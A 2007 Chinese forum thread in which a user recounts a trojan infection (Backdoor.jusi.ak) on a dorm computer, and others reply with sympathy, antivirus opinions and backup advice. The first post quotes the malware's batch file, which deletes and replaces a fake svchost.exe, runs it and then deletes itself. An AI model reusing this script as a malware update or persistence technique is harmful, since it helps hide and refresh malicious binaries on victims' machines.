我靠，宿舍的电脑居然中毒了~~~~

coolfax

今天宿舍的朋友用电脑下载了一些文件，晚上我回来使用感觉电脑启动和使用都比较慢，本来也没太在意。心想反正安装了瑞星2007，如果有病毒肯定会通知我。 今晚正在上网的时候，我无意中发现： 只要我打开IE,无论我有没有开网页，网卡的数据吞吐率到会高达5%。这令我吃了一惊：“很不正常！”因为除非是在下载文件，否则网络流量是不可能达到这个值的。 再查网卡的流量，发现发送的数据量居然比收到的量还大。完全可以肯定：中毒了！ 检查中还发现，桌面无端端多了个updskl.BAT文件，查看内容如下： @echo off :loop del "C:\Program Files\Common Files\System\svchost.exe" del "C:\Program Files\Common Files\System\ver.txt" del "C:\Program Files\Common Files\System\she.dll" if exist "C:\Program Files\Common Files\System\svchost.exe" goto loop C: cd C:\Program Files\Common Files\System\ ren svchostnew.exe svchost.exe call "C:\Program Files\Common Files\System\svchost.exe" del "C:\Program Files\Common Files\System\updskl.bat" 看来这个病毒不是那么简单。使用瑞星扫描C盘，果然杀出了一堆木马：Backdoor.jusi.ak 文件名类似于：coco.dll、RpcS.exe、rpcsu.exe等。 而且除了windows目录，病毒还藏于C:\Program Files里面多个文件夹，随机生成很多名字。 上网搜了一下，发现是个很新的病毒，网上关于它的资料非常少，传播方式很像熊猫。最糟糕的是，在我杀毒的同时，病毒以及开始向其他盘蔓延。瑞星不断报告其它盘的EXE文件也陆续感染了这个病毒。 于是不能再等了，我马上重启了电脑。用Ghost还原了系统。重新进入新系统之后，第一时间装瑞星，升级到最新病毒库。对c盘以外的其它盘开始大屠杀。还好重装得比较及时，病毒没来得及感染太多EXE文件。 清点一下损失： 我的SQL数据库没来得及备份，完蛋了。可怜我这段时间工作的心血啊～～～ 收藏夹没备份，完蛋了。可怜我收藏多年的网站啊～～ 几个常玩的游戏感染了被删除了，如CS。

XiaoChong

瑞星 很LJ .  同情下.........

妮可宝贝

楼主手快了.. 在这种中毒的状态下恢复GHOST之前,应该再GHOST备份一下, 这样可以将不可知的资料损失降低到最小..

飒飞

收藏夹向来不放C盘，一般重装系统都会忘记备份

swimman

同情。。C盘只装系统，，，

2hand

真是同情啊。看来GHOST是很必要的。

单恋一枝花

现在有病毒猛于虎
同事有装瑞星的，不评价了，我还是用卡巴

apwang

瑞星2007,完全安装,所有监控开启,最新病毒库
报告机器很慢,比较迟钝
我去了,肉眼都看见C/D根目录下面的一堆怪名文件,进程里面明显的木马,而且绝对就是网络里面报告的经典名称,居然和瑞星相安无事

ydm

遇到这样的问题还是先断开网络，安全模式或是pe光盘引导起来备份完数据再ghost.不至于损失很多。

coolfax

原帖由 妮可宝贝 于 2007-5-19 00:04 发表
楼主手快了.. 在这种中毒的状态下恢复GHOST之前,应该再GHOST备份一下, 这样可以将不可知的资料损失降低到最小..

;@ 当时急着要清理病毒，没考虑得那么周到

因为我其它盘放着那么多年来收集的80多G的软件，我怕万一感染了，辛苦下载的东西都白费了